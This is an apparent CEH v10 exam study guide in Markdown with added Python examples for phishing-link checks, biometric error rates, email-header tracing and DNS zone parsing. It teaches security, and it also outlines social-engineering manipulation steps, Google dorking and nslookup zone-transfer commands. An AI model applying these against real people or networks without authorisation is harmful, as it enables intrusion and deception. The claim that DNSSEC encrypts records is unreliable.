├── _config.yml
├── Readme.md
├── 13 - The Pen Test - Putting It All Together.md
├── 9 - Security in Cloud Computing.md
├── 12 - Low Tech - Social Engineering and Physical Security.md
├── 2 - Reconnaissance.md
├── 7 - Wireless Network Hacking.md
├── 8 - Mobile Communications and IoT.md
├── 6 - Web-Based Hacking - Servers and Applications.md
├── 10 - Trojans and Other Attacks.md
├── LICENSE
├── 4 - Sniffing and Evasion.md
├── 11 - Cryptography 101.md
├── 5 - Attacking a System.md
├── 1 - Essential Knowledge.md
└── 3 - Scanning and Enumeration.md
/_config.yml:
--------------------------------------------------------------------------------
theme: jekyll-theme-cayman
--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
# CEH v10 Study Guide

Created based off information found in [CEH Certified Ethical Hacker All-in-One Exam Guide, Fourth Edition](https://www.amazon.com/gp/product/126045455X/ref=ppx_yo_dt_b_asin_title_o02_s00?ie=UTF8&psc=1) by Matt Walker

## Table of Contents

[1 - Essential Knowledge](1 - Essential Knowledge.md)

[2 - Reconnaissance](2 - Reconnaissance.md)

[3 - Scanning and Enumeration](3 - Scanning and Enumeration.md)

[4 - Sniffing and Evasion](4 - Sniffing and Evasion.md)

[5 - Attacking a System](5 - Attacking a System.md)

[6 - Web-Based Hacking - Servers and Applications](6 - Web-Based Hacking - Servers and Applications.md)

[7 - Wireless Network Hacking](7 - Wireless Network Hacking.md)

[8 - Mobile Communications and IoT](8 - Mobile Communications and IoT.md)

[9 - Security in Cloud Computing](9 - Security in Cloud Computing.md)

[10 - Trojans and Other Attacks](10 - Trojans and Other Attacks.md)

[11 - Cryptography 101](11 - Cryptography 101.md)

[12 - Low Tech - Social Engineering and Physical Security](12 - Low Tech - Social Engineering and Physical Security.md)

[13 - The Pen Test - Putting It All Together](13 - The Pen Test - Putting It All Together.md)

--------------------------------------------------------------------------------
/13 - The Pen Test - Putting It All Together.md:
--------------------------------------------------------------------------------
# The Pen Test: Putting It All Together

- **Security Assessment** - test performed in order to assess the level of security on a network or system
- **Security Audit** - policy and procedure focused; tests whether the organization is following specific standards and policies
- **Vulnerability Assessment** - scans and tests for vulnerabilities but does not intentionally exploit them
- **Penetration Test** - looks for vulnerabilities and actively seeks to exploit them
- Need to make sure you have a great contract in place to protect you from liability
- **Types of Pen Tests**
  - **External Assessment** - analyzes publicly available information; conducts network scanning, enumeration and testing from the network perimeter
  - **Internal Assessment** - performed from within the organization, from various network access points
  - **Red Team** - pen test team that is doing the attacking
  - **Blue Team** - pen test team that is doing the defending
  - **Purple Team** - pen test team that is doing both attacking and defending
- **Automated Testing Tools**
  - **Codenomicon** - utilizes fuzz testing that learns the tested system automatically; allows pen testers to enter new domains such as VoIP assessment
  - **Core Impact Pro** - best known, all-inclusive automated testing framework; tests everything from web applications and individual systems to network devices and wireless
  - **Metasploit** - framework for developing and executing code against a remote target machine
  - **CANVAS** - hundreds of exploits, an automated exploitation system and an extensive exploit development framework
- **Phases of Pen Test**
  - **Pre-Attack Phase** - reconnaissance and data gathering
  - **Attack Phase** - attempts to penetrate the network and execute attacks
  - **Post-Attack Phase** - cleanup to return a system to the pre-attack condition and deliver reports

### Security Assessment Deliverables

- Usually begins with a brief to management
  - Provides information about your team and an overview of the original agreement
  - Explains what tests were done and their results
- **Comprehensive Report Parts**
  - Executive summary of the organization's security posture
  - Names of all participants and dates of tests
  - List of all findings, presented in order of risk
  - Analysis of each finding and recommended mitigation steps
  - Log files and other evidence (screenshots, etc.)
- Example reports and methodology can be found in the **Open Source Security Testing Methodology Manual** (OSSTMM)

### Terminology

- **Types of Insiders**
  - **Pure Insider** - employee with all the rights and access associated with being an employee
  - **Elevated Pure Insider** - employee who has admin privileges
  - **Insider Associate** - someone with limited authorized access, such as a contractor, guard or cleaning service person
  - **Insider Affiliate** - spouse, friend or client of an employee who uses the employee's credentials to gain access
  - **Outside Affiliate** - someone outside the organization who uses an open access channel to gain access to an organization's resources

--------------------------------------------------------------------------------
/9 - Security in Cloud Computing.md:
--------------------------------------------------------------------------------
# Security in Cloud Computing

### Cloud Computing Basics

- **Three Types**
  - **Infrastructure as a Service** (IaaS)
    - Provides virtualized computing resources
    - Third party hosts the servers, with a hypervisor running the VMs as guests
    - Subscribers usually pay on a per-use basis
  - **Platform as a Service** (PaaS)
    - Geared towards software development
    - Hardware and software hosted by the provider
    - Provides the ability to develop without having to worry about hardware or software
  - **Software as a Service** (SaaS)
    - Provider supplies on-demand applications to subscribers
    - Offloads the need for patch management, compatibility and version control
- **Deployment Models**
  - **Public Cloud** - services provided over a network that is open for the public to use
  - **Private Cloud** - cloud solely for use by one tenant; usually done in larger organizations
  - **Community Cloud** - cloud shared by several organizations, but not open to the public
  - **Hybrid Cloud** - a composition of two or more cloud deployment models
- **NIST Cloud Architecture**
  - **Cloud Carrier** - organization with responsibility for transferring data; akin to the power distributor for an electric grid
  - **Cloud Consumer** - acquires and uses cloud products and services
  - **Cloud Provider** - purveyor of products and services
  - **Cloud Broker** - manages use, performance and delivery of services as well as relationships between providers and subscribers
  - **Cloud Auditor** - independent assessor of cloud services and security controls
- **FedRAMP** - regulatory effort regarding cloud computing
- **PCI DSS** - deals with debit and credit cards, but also has a cloud SIG

### Cloud Security

- The problem with cloud security is what you are allowed to test and what you should test
- Another concern is the hypervisor: if the hypervisor is compromised, all hosts on that hypervisor are as well
- **Trusted Computing Model** - attempts to resolve computer security problems through hardware enhancements
  - **Roots of Trust** (RoT) - set of functions within the TCM that are always trusted by the OS
- **Tools**
  - **CloudInspect** - pen-testing application for AWS EC2 users
  - **CloudPassage Halo** - instant visibility and continuous protection for servers in any cloud
  - **Dell Cloud Manager**
  - **Qualys Cloud Suite**
  - **Trend Micro's Instant-On Cloud Security**
  - **Panda Cloud Office Protection**

### Threats and Attacks

- **Data Breach or Loss** - biggest threat; includes malicious theft, erasure or modification
- **Shadow IT** - IT systems or solutions that are developed to handle an issue but aren't taken through the proper approval chain
- **Abuse of Cloud Resources** - another high threat (usually applies to IaaS and PaaS)
- **Insecure Interfaces and APIs** - cloud services can't function without them, but you need to make sure they are secure
  - **Service Oriented Architecture** - API that makes it easier for application components to cooperate and exchange information
- Insufficient due diligence - moving an application without knowing the security differences
- Shared technology issues - multitenant environments that don't provide proper isolation
- Unknown risk profiles - subscribers simply don't know what security provisions are made in the background
- Others include malicious insiders, inadequate design and DDoS
- **Wrapping Attack** - SOAP message is intercepted and the data in the envelope is changed and sent/replayed
- **Session Riding** - CSRF under a different name; deals with cloud services instead of traditional data centers
- **Side Channel Attack** - using an existing VM on the same physical host to attack another
  - More broadly defined as using something other than the direct interface to attack a system

--------------------------------------------------------------------------------
/12 - Low Tech - Social Engineering and Physical Security.md:
--------------------------------------------------------------------------------
# Low Tech: Social Engineering and Physical Security

### Social Engineering

- The art of manipulating a person or group into providing information or a service they would otherwise not have given
- **Phases**
  1. Research (dumpster dive, visit websites, tour the company, etc.)
  2. Select the victim (identify a frustrated employee or other target)
  3. Develop a relationship
  4. Exploit the relationship (collect sensitive information)
- **Reasons This Works**
  - Human nature (trusting others)
  - Ignorance of social engineering efforts
  - Fear (of the consequences of not providing the information)
  - Greed (promised gain for providing the requested information)
  - A sense of moral obligation

### Human-Based Attacks

- **Dumpster Diving** - looking for sensitive information in the trash
  - Shredded papers can sometimes indicate sensitive info
- **Impersonation** - pretending to be someone you're not
  - Can be anything from a help desk person up to an authoritative figure (FBI agent)
  - Posing as a tech support professional can very quickly gain a person's trust
- **Shoulder Surfing** - looking over someone's shoulder to get info
  - Can be done from a long distance with binoculars, etc.
- **Eavesdropping** - listening in on conversations about sensitive information
- **Tailgating** - attacker has a fake badge and walks in behind someone who has a valid one
- **Piggybacking** - attacker pretends they lost their badge and asks someone to hold the door
- **RFID Identity Theft** (RFID skimming) - stealing an RFID card signature with a specialized device
- **Reverse Social Engineering** - getting someone to call you and give information
  - Often happens with tech support - an email is sent to the user stating they need to call back (due to a technical issue), and the user calls back
  - Can also be combined with a DoS attack to cause a problem that the user would need to call about
  - Always be pleasant - it gets more information
- **Rebecca** or **Jessica** - targets for social engineering
- **Insider Attack** - an attack from an employee, generally disgruntled
  - Sometimes subclassified (negligent insider, professional insider)

### Computer-Based Attacks

- Can begin with sites like Facebook where information about a person is available
  - For instance, if you know Bob is working on a project, an email crafted to him about that project would seem quite normal if you spoof it from a person on his project
- **Phishing** - crafting an email that appears legitimate but contains links to fake websites or to download malicious content
- **Ways to Avoid Phishing**
  - Beware unknown, unexpected or suspicious originators
  - Beware of who the email is addressed to
  - Verify phone numbers
  - Beware bad spelling or grammar
  - Always check links
- **Spear Phishing** - targeting a person or a group with a phishing attack
  - Can be more useful because the attack can be targeted
- **Whaling** - going after CEOs or other C-level executives
- **Pharming** - use of malicious code that redirects a user's traffic
- **Spimming** - sending spam over instant message
- **Tools** - Netcraft Toolbar and PhishTank Toolbar
- **Fake Antivirus** - very prevalent attack; pretends to be an anti-virus but is a malicious tool

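"Always check links" is the one item in the list above that can be automated. The script below is an added example, not part of the study guide or the book it summarizes: it walks the anchors of an HTML email body and flags any link whose visible text is itself a URL or domain naming a different host than the real `href`, which is the classic phishing lure. The HTML message and every domain in it are constructed placeholders.

```python
"""Flag links in an HTML email whose visible text points somewhere other
than the href does. Added example (not from the study guide); the message
body below is constructed and all domains are placeholders.
"""
import re
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Constructed sample body: one lure link and one honest link.
SAMPLE_HTML = """\
<p>Your account needs verification.</p>
<p>Visit <a href="http://login.example-bank.test.attacker-placeholder.test/">
https://login.example-bank.test/</a> within 24 hours.</p>
<p>Questions? See our <a href="https://www.example-bank.test/help">help center</a>.</p>
"""

# Visible text that reads like a URL or bare domain (optionally with a path).
URL_TEXT_RE = re.compile(
    r"^(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}(?:/\S*)?$", re.IGNORECASE
)


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self) -> None:
        super().__init__()
        self.links: List[Tuple[str, str]] = []
        self._href: Optional[str] = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            # Collapse whitespace so folded text compares cleanly.
            shown = " ".join("".join(self._text).split())
            self.links.append((self._href, shown))
            self._href = None


def extract_links(html: str) -> List[Tuple[str, str]]:
    parser = _LinkCollector()
    parser.feed(html)
    parser.close()
    return parser.links


def _host(value: str) -> Optional[str]:
    """Lowercase hostname of a URL or bare domain; None if it has none."""
    if "://" not in value:
        value = "http://" + value
    host = urlparse(value).hostname
    return host.lower() if host else None


def mismatched_links(html: str) -> List[dict]:
    """Links whose visible text names a different host than their href."""
    findings = []
    for href, text in extract_links(html):
        if not URL_TEXT_RE.match(text):
            continue  # plain words like "help center" cannot mislead by host
        shown, actual = _host(text), _host(href)
        if shown and actual and shown != actual:
            findings.append({"shown": shown, "actual": actual, "href": href})
    return findings


if __name__ == "__main__":
    for f in mismatched_links(SAMPLE_HTML):
        print(f"display text says {f['shown']} but link goes to {f['actual']}")
```

The check deliberately ignores anchors whose text is ordinary words: those still deserve a hover before clicking, but they cannot lie about a host the way a URL-shaped label can.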
### Mobile-Based Attacks

- **ZitMo** (ZeuS-in-the-Mobile) - banking malware that was ported to Android
  - SMS messages can be sent to request premium services
- **Attacks**
  - Publishing malicious apps
  - Repackaging legitimate apps
  - Fake security applications
  - SMS (**smishing**)

### Physical Security Basics

- **Physical measures** - everything you can touch, taste, smell or get shocked by
  - Includes things like air quality, power concerns, humidity-control systems
- **Technical measures** - smartcards and biometrics
- **Operational measures** - policies and procedures you set up to enforce a security-minded operation
- **Access controls** - physical measures designed to prevent access to controlled areas
- **Biometrics** - measures taken for authentication that come from the "something you are" concept
  - **False rejection rate** (FRR) - when a biometric rejects a valid user
  - **False acceptance rate** (FAR) - when a biometric accepts an invalid user
  - **Crossover error rate** (CER) - combination of the two; determines how good a system is
- Even though hackers normally don't worry about environmental disasters, this is something to think of from a pen test standpoint (hurricanes, tornadoes, floods, etc.)

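FRR, FAR and CER are easiest to understand when computed. The block below is an added example (not from the study guide): given match scores a biometric system produced for valid users and for impostors, it computes both error rates at any acceptance threshold and then finds the threshold where they cross, which is the CER. The two score lists are constructed for illustration.

```python
"""Compute FRR, FAR and the crossover error rate (CER) from match scores.

Added example (not from the study guide). The score lists are constructed
to stand in for a biometric matcher's output on a small test set.
"""
from typing import List, Tuple

# Constructed matcher scores in [0, 100]; higher means a stronger match.
GENUINE_SCORES = [92, 88, 85, 81, 79, 76, 74, 70, 66, 61]   # valid users
IMPOSTOR_SCORES = [65, 58, 52, 49, 45, 41, 38, 33, 27, 20]  # invalid users


def frr(genuine: List[float], threshold: float) -> float:
    """False rejection rate: share of valid users scoring below the threshold."""
    return sum(1 for s in genuine if s < threshold) / len(genuine)


def far(impostor: List[float], threshold: float) -> float:
    """False acceptance rate: share of impostors scoring at or above it."""
    return sum(1 for s in impostor if s >= threshold) / len(impostor)


def crossover_error_rate(genuine: List[float], impostor: List[float]) -> Tuple[float, float]:
    """Return (threshold, error_rate) where FRR and FAR are closest.

    Every observed score is a candidate threshold; the one with the smallest
    |FRR - FAR| is the crossover, and the rate there is the CER.
    """
    best = None
    for t in sorted(set(genuine) | set(impostor)):
        gap = abs(frr(genuine, t) - far(impostor, t))
        rate = (frr(genuine, t) + far(impostor, t)) / 2
        if best is None or gap < best[0]:
            best = (gap, t, rate)
    return best[1], best[2]


def tradeoff_table(genuine: List[float], impostor: List[float], thresholds: List[float]) -> List[dict]:
    """FRR/FAR at each threshold, showing that raising one lowers the other."""
    return [
        {"threshold": t, "frr": frr(genuine, t), "far": far(impostor, t)}
        for t in thresholds
    ]


if __name__ == "__main__":
    for row in tradeoff_table(GENUINE_SCORES, IMPOSTOR_SCORES, [40, 60, 65, 80]):
        print(f"threshold {row['threshold']:>3}: FRR={row['frr']:.1f} FAR={row['far']:.1f}")
    t, cer = crossover_error_rate(GENUINE_SCORES, IMPOSTOR_SCORES)
    print(f"crossover at threshold {t}, CER={cer:.2f}")
```

A high-security door is tuned above the crossover (more false rejections, fewer false acceptances); a convenience device is tuned below it. The CER itself is what lets two systems be compared independently of how each is tuned.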
--------------------------------------------------------------------------------
/2 - Reconnaissance.md:
--------------------------------------------------------------------------------
# Reconnaissance

### Footprinting

- Looking for high-level information on a target
- Types
  - **Anonymous** - information gathering without revealing anything about yourself
  - **Pseudonymous** - making someone else take the blame for your actions

### Four Main Focuses

- Know the security posture
- Reduce the focus area
- Identify vulnerabilities
- Draw a network map

### Types of Footprinting

- **Active** - requires the attacker to touch the device or network
  - Social engineering and other communication that requires interaction with the target
- **Passive** - measures to collect information from publicly available sources
  - Websites, DNS records, business information databases

**Competitive Intelligence** - information gathered by businesses about competitors

**Alexa.com** - resource for statistics about websites

### Methods and Tools

**Search Engines**

- **NetCraft** - information about a website and possibly OS info
- **Job Search Sites** - information about technologies can be gleaned from job postings
- **Google**
  - filetype: - looks for file types
  - index of - directory listings
  - info: - contains Google's information about the page
  - intitle: - string in title
  - inurl: - string in URL
  - link: - finds linked pages
  - related: - finds similar pages
  - site: - finds pages specific to that site
- **Metagoofil** - uses Google hacks to find information in meta tags

**Website Footprinting**

- **Web mirroring** - allows for discreet testing offline
  - HTTrack
  - Black Widow
  - Wget
  - WebRipper
  - Teleport Pro
  - Backstreet Browser
- **Archive.org** - provides cached websites from various dates, which possibly have sensitive information that has since been removed

**Email Footprinting**

- **Email header** - may show servers and where those servers are located
- **Email tracking** - services can track various bits of information, including the IP address where the email was opened, where it went, etc.

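The "servers" an email header shows are the `Received:` lines, one prepended by each mail server the message passed through, so reading them bottom-up gives the path from the sender's machine to the recipient's. The script below is an added example, not from the study guide or the book: it parses those headers with the standard `email` module and returns the hops in transit order. The sample message, its hostnames and its addresses are constructed placeholders.

```python
"""Walk the Received: chain of an email and list its relay hops.

Added example (not from the study guide). The sample message is constructed;
hostnames and IP addresses are placeholders.
"""
import re
from email import message_from_string
from email.utils import parsedate_to_datetime
from typing import Dict, List, Optional

# Constructed sample with three relays. Each MTA prepends its own Received:
# line, so the top-most header is the final hop and the bottom one the origin.
SAMPLE_EMAIL = """\
Received: from mx2.example-corp.test (mx2.example-corp.test [203.0.113.25])
\tby inbound.example-corp.test with ESMTPS id ABC123
\tfor <bob@example-corp.test>; Mon, 02 Mar 2020 09:15:03 +0000
Received: from relay.mail-provider.test (relay.mail-provider.test [198.51.100.7])
\tby mx2.example-corp.test with ESMTP id DEF456;
\tMon, 02 Mar 2020 09:15:01 +0000
Received: from workstation-17 (unknown [192.0.2.44])
\tby relay.mail-provider.test with ESMTPA id GHI789;
\tMon, 02 Mar 2020 09:14:58 +0000
From: Alice <alice@mail-provider.test>
To: bob@example-corp.test
Subject: Project update
Message-ID: <constructed-id@mail-provider.test>

Hi Bob, see attached.
"""

# "from <helo> (<reverse-dns> [<ip>]) by <server>"; the parenthesised part
# is optional because some MTAs omit it.
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s*"
    r"(?:\((?P<rdns>[^\s\[\]]+)?\s*\[(?P<ip>[0-9a-fA-F.:]+)\]\))?"
    r"\s*by\s+(?P<by>\S+)"
)


def parse_received_chain(raw: str) -> List[Dict]:
    """Return relay hops in transit order: origin first, final server last."""
    msg = message_from_string(raw)
    hops = []
    # get_all preserves header order (top of message first); reverse it so
    # the sender's hop comes first.
    for header in reversed(msg.get_all("Received", [])):
        unfolded = " ".join(header.split())  # join continuation lines
        match = RECEIVED_RE.search(unfolded)
        if not match:
            continue
        # The timestamp follows the last ';' in a well-formed Received header.
        date_part = unfolded.rsplit(";", 1)[-1].strip() if ";" in unfolded else ""
        try:
            when = parsedate_to_datetime(date_part) if date_part else None
        except (TypeError, ValueError):
            when = None
        hops.append({
            "helo": match.group("helo"),
            "rdns": match.group("rdns"),
            "ip": match.group("ip"),
            "by": match.group("by"),
            "time": when,
        })
    return hops


def origin_ip(raw: str) -> Optional[str]:
    """IP the first relay saw the message come from, if the header records one."""
    hops = parse_received_chain(raw)
    return hops[0]["ip"] if hops else None


if __name__ == "__main__":
    for i, hop in enumerate(parse_received_chain(SAMPLE_EMAIL), 1):
        print(f"hop {i}: {hop['helo']} [{hop['ip']}] -> {hop['by']} at {hop['time']}")
```

Only the `Received:` line added by your own mail server can be trusted; anything below it was written by servers you do not control and can be forged, which is why the timestamps and reverse-DNS names are kept alongside the IPs for cross-checking.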
**DNS Footprinting**

- Ports
  - Name lookup - UDP 53
  - Zone transfer - TCP 53
- Zone transfer replicates all records
- **Name resolvers** answer requests
- **Authoritative Servers** hold all records for a namespace
- **DNS Record Types**

  | Name  | Description        | Purpose                                        |
  | ----- | ------------------ | ---------------------------------------------- |
  | SRV   | Service            | Points to a specific service                   |
  | SOA   | Start of Authority | Indicates the authoritative NS for a namespace |
  | PTR   | Pointer            | Maps an IP to a hostname                       |
  | NS    | Nameserver         | Lists the nameservers for a namespace          |
  | MX    | Mail Exchange      | Lists email servers                            |
  | CNAME | Canonical Name     | Maps a name to an A record                     |
  | A     | Address            | Maps a hostname to an IP address               |

- **DNS Poisoning** - changes the cache on a machine to redirect requests to a malicious server
- **DNSSEC** - helps prevent DNS poisoning by encrypting records
- **SOA Record Fields**
  - **Source Host** - hostname of the primary DNS
  - **Contact Email** - email for the person responsible for the zone file
  - **Serial Number** - revision number that increments with each change
  - **Refresh Time** - time in which an update should occur
  - **Retry Time** - time that a NS should wait on a failure
  - **Expire Time** - time in which a zone transfer is allowed to complete
  - **TTL** - minimum TTL for records within the zone
- **IP Address Management**
  - **ARIN** - North America
  - **APNIC** - Asia Pacific
  - **RIPE** - Europe, Middle East
  - **LACNIC** - Latin America
  - **AfriNIC** - Africa
- **Whois** - obtains registration information for the domain
- **Nslookup** - performs DNS queries
  - nslookup [ - options ] [ hostname ]
  - interactive zone transfer
    - nslookup
    - server
    - set type = any
    - ls -d domainname.com
- **Dig** - Unix-based command like nslookup
  - dig @server name type

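The SOA fields listed above appear in a fixed order in a zone file, and the record types in the table each carry their own rdata layout. The script below is an added example, not from the study guide or the book: it parses a small zone fragment into its SOA and resource records and then sanity-checks the SOA timers against the widely used RFC 1912 guidance (retry shorter than refresh; expire longer than refresh plus retry, or a secondary could discard the zone before it ever retries). The zone, `example.test` and all addresses in it are constructed placeholders.

```python
"""Parse a small zone-file fragment and sanity-check its SOA timers.

Added example (not from the study guide). The zone below is constructed;
example.test and the addresses are placeholders.
"""
from typing import Dict, List

# Constructed zone. SOA rdata order is fixed by RFC 1035:
# MNAME RNAME SERIAL REFRESH RETRY EXPIRE MINIMUM.
SAMPLE_ZONE = """\
$ORIGIN example.test.
$TTL 3600
@        IN SOA  ns1.example.test. hostmaster.example.test. (
                 2020030201 ; serial (YYYYMMDDnn)
                 7200       ; refresh
                 900        ; retry
                 1209600    ; expire
                 300 )      ; minimum / negative-cache TTL
@        IN NS   ns1.example.test.
@        IN NS   ns2.example.test.
@        IN MX   10 mail.example.test.
@        IN A    192.0.2.10
www      IN CNAME example.test.
mail     IN A    192.0.2.25
_ldap._tcp IN SRV 0 5 389 ldap.example.test.
"""

SOA_FIELDS = ["mname", "rname", "serial", "refresh", "retry", "expire", "minimum"]


def _tokenize(zone_text: str) -> List[List[str]]:
    """Split zone text into records, joining '(' ... ')' multi-line groups."""
    records, current, depth = [], [], 0
    for raw in zone_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop comments
        if not line:
            continue
        for tok in line.split():
            if tok == "(":
                depth += 1
            elif tok == ")":
                depth -= 1
            else:
                current.append(tok)
        if depth == 0 and current:
            records.append(current)
            current = []
    return records


def parse_zone(zone_text: str) -> Dict:
    """Return {'soa': {...}, 'records': [{'name', 'type', 'rdata'}, ...]}."""
    zone: Dict = {"soa": None, "records": []}
    for tokens in _tokenize(zone_text):
        if tokens[0].startswith("$"):
            continue  # $ORIGIN / $TTL directives
        name, rest = tokens[0], tokens[1:]
        if rest and rest[0] == "IN":  # class is optional in zone files
            rest = rest[1:]
        rtype, rdata = rest[0], rest[1:]
        if rtype == "SOA":
            fields = dict(zip(SOA_FIELDS, rdata))
            for key in SOA_FIELDS[2:]:  # serial and the four timers are integers
                fields[key] = int(fields[key])
            zone["soa"] = fields
        else:
            zone["records"].append({"name": name, "type": rtype, "rdata": rdata})
    return zone


def records_of_type(zone: Dict, rtype: str) -> List[Dict]:
    return [r for r in zone["records"] if r["type"] == rtype]


def check_soa_timers(soa: Dict) -> List[str]:
    """Problems with the SOA timers, following RFC 1912 guidance."""
    problems = []
    if soa["retry"] >= soa["refresh"]:
        problems.append("retry should be shorter than refresh")
    if soa["expire"] <= soa["refresh"] + soa["retry"]:
        problems.append("expire must exceed refresh + retry")
    return problems


if __name__ == "__main__":
    zone = parse_zone(SAMPLE_ZONE)
    print("SOA:", zone["soa"])
    print("NS records:", [r["rdata"] for r in records_of_type(zone, "NS")])
    print("timer problems:", check_soa_timers(zone["soa"]) or "none")
```

From a defender's side, the same parser is a convenient way to diff the serial and NS set between what your primary serves and what the public resolvers return, which is how an unauthorized zone change or a hijacked delegation first shows up.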
**Network Footprinting**

- IP address range can be obtained from the regional registrar (ARIN here)
- Use traceroute to find intermediary servers
  - traceroute uses ICMP echo in Windows
  - Windows command - tracert
  - Linux command - traceroute

**Other Tools**

- **OSRFramework** - uses open source intelligence to get information about a target
- **Web Spiders** - obtain information from the website such as pages, etc.
- **Social Engineering Tools**
  - Maltego
  - Social Engineering Framework (SEF)
- **Shodan** - search engine that shows devices connected to the Internet

**Computer Security Incident Response Team** (CSIRT) - point of contact for all incident response services for associates of the DHS

--------------------------------------------------------------------------------
/7 - Wireless Network Hacking.md:
--------------------------------------------------------------------------------
# Wireless Network Hacking

### Wireless Basics

- **802.11 Series** - defines the standards for wireless networks
- **802.15.1** - Bluetooth
- **802.15.4** - Zigbee - low power, low data rate, close proximity ad-hoc networks
- **802.16** - WiMAX - broadband wireless metropolitan area networks

| Wireless Standard | Operating Speed (Mbps) | Frequency (GHz) | Modulation Type |
|-------------------|------------------------|-----------------|-----------------|
| 802.11a           | 54                     | 5               | OFDM            |
| 802.11b           | 11                     | 2.4             | DSSS            |
| 802.11d           | Variation of a & b     | Global use      |                 |
| 802.11e           | QoS Initiative         | Data and voice  |                 |
| 802.11g           | 54                     | 2.4             | OFDM and DSSS   |
| 802.11i           | WPA/WPA2 Encryption    |                 |                 |
| 802.11n           | 100+                   | 2.4-5           | OFDM            |
| 802.11ac          | 1000                   | 5               | QAM             |

- **Orthogonal Frequency-Division Multiplexing** (OFDM) - carries waves in various channels
- **Direct-Sequence Spread Spectrum** (DSSS) - combines all available waveforms into a single purpose
- **Basic Service Set** (BSS) - communication between a single AP and its clients
- **Basic Service Set Identifier** (BSSID) - MAC address of the wireless access point
- **Spectrum Analyzer** - verifies wireless quality, detects rogue access points and detects attacks
- **Directional antenna** - signals in one direction; a Yagi antenna is one type
- **Omnidirectional antenna** - signals in all directions
- **Service Set Identifier** (SSID) - a text word (<= 32 characters) that identifies the network; provides no security
- **Three Types of Authentication**
  - **Open System** - no authentication
  - **Shared Key Authentication** - authentication through a shared key (password)
  - **Centralized Authentication** - authentication through something like RADIUS
- **Association** is the act of connecting; **authentication** is the act of identifying the client

### Wireless Encryption

- **Wired Equivalent Privacy** (WEP)
  - Doesn't effectively encrypt anything
  - Uses RC4 for encryption
  - Original intent was to give wireless the same level of protection as an Ethernet hub
  - **Initialization Vector** (IV) - used to calculate a 32-bit integrity check value (ICV)
    - IVs are generally small and are frequently reused
    - Sent in clear text as a part of the header
    - This combined with RC4 makes it easy to decrypt the WEP key
    - An attacker can send disassociate requests to the AP to generate a lot of these
- **Wi-Fi Protected Access** (WPA or WPA2)
  - WPA uses TKIP with a 128-bit key
  - WPA changes the key every 10,000 packets
  - WPA transfers keys back and forth during an **Extensible Authentication Protocol** (EAP) exchange
  - **WPA2 Enterprise** - can tie an EAP or RADIUS server into the authentication
  - **WPA2 Personal** - uses a pre-shared key to authenticate
  - WPA2 uses AES for encryption
  - WPA2 ensures FIPS 140-2 compliance
  - WPA2 uses CCMP instead of TKIP
  - **Message Integrity Codes** (MIC) - hashes for CCMP to protect integrity
  - **Cipher Block Chaining Message Authentication Code** (CBC-MAC) - integrity process of WPA2

| Wireless Standard | Encryption | IV Size (Bits) | Key Length (Bits) | Integrity Check |
|-------------------|------------|----------------|-------------------|-----------------|
| WEP               | RC4        | 24             | 40/104            | CRC-32          |
| WPA               | RC4 + TKIP | 48             | 128               | Michael/CRC-32  |
| WPA2              | AES-CCMP   | 48             | 128               | CBC-MAC (CCMP)  |

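The table's IV sizes explain the "small and frequently reused" point above. The block below is an added example, not from the study guide or the book: it applies the birthday-bound approximation p(n) = 1 - exp(-n(n-1) / 2N), with N = 2^bits, to estimate how many frames a network can send before an IV repeat becomes likely, for the 24-bit WEP IV against the 48-bit WPA/WPA2 one. It assumes IVs are drawn uniformly at random; a card that simply counts upward wraps after exactly 2^24 frames under WEP, which is no better.

```python
"""Probability that a per-frame IV repeats after n frames, by IV size.

Added example (not from the study guide). Uses the birthday-bound
approximation p(n) = 1 - exp(-n(n-1) / (2 * 2^bits)) and assumes each IV
is chosen uniformly at random.
"""
import math

WEP_IV_BITS = 24   # from the table above
WPA_IV_BITS = 48   # WPA (TKIP) and WPA2 (CCMP)


def iv_collision_probability(frames: int, iv_bits: int) -> float:
    """Chance that at least one IV value was used twice among `frames` frames."""
    space = 2 ** iv_bits
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * space))


def frames_until_probability(target: float, iv_bits: int) -> int:
    """Smallest frame count at which a repeat is at least `target` likely."""
    space = 2 ** iv_bits
    # Closed-form estimate from n^2 / 2N ~ -ln(1 - target), then settle on
    # the exact integer boundary with the n(n-1) form.
    n = max(1, int(math.sqrt(-2.0 * space * math.log(1.0 - target))))
    while iv_collision_probability(n, iv_bits) < target:
        n += 1
    while n > 1 and iv_collision_probability(n - 1, iv_bits) >= target:
        n -= 1
    return n


def busy_network_reuse_odds(frames_per_second: int, seconds: int, iv_bits: int) -> float:
    """Repeat probability after a given traffic volume, e.g. one busy hour."""
    return iv_collision_probability(frames_per_second * seconds, iv_bits)


if __name__ == "__main__":
    for bits in (WEP_IV_BITS, WPA_IV_BITS):
        n50 = frames_until_probability(0.5, bits)
        hour = busy_network_reuse_odds(500, 3600, bits)
        print(f"{bits}-bit IV: 50% reuse after {n50:,} frames; "
              f"after one hour at 500 frames/s p = {hour:.4f}")
```

The contrast is the point: a 24-bit IV space is exhausted statistically within a few thousand frames, while moving to 48 bits pushes the same odds out by roughly four orders of magnitude, which is why WPA did not need a new cipher to fix this particular flaw, only a larger, sequenced IV.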
### Wireless Hacking

- **Threats**
  - Access Control Attacks
  - Integrity Attacks
  - Confidentiality Attacks
  - Availability Attacks
  - Authentication Attacks
- **Network Discovery**
  - Wardriving, warflying, warwalking, etc.
  - Tools such as WiFiExplorer, WiFiFoFum, OpenSignalMaps, WiFinder
  - **WIGLE** - map of wireless networks
  - **NetStumbler** - tool to find networks
  - **Kismet** - wireless packet analyzer/sniffer that can be used for discovery
    - Works without sending any packets (passively)
    - Can detect access points that have not been configured
    - Works by channel hopping
    - Can discover networks not sending beacon frames
    - Ability to sniff packets and save them to a log file (readable by Wireshark/tcpdump)
  - **NetSurveyor** - tool for Windows with features similar to NetStumbler and Kismet
    - Doesn't require special drivers
- **WiFi Adapter**
  - AirPcap is mentioned for Windows, but isn't made anymore
  - **pcap** - driver library for Windows
  - **libpcap** - driver library for Linux

### Wireless Attacks

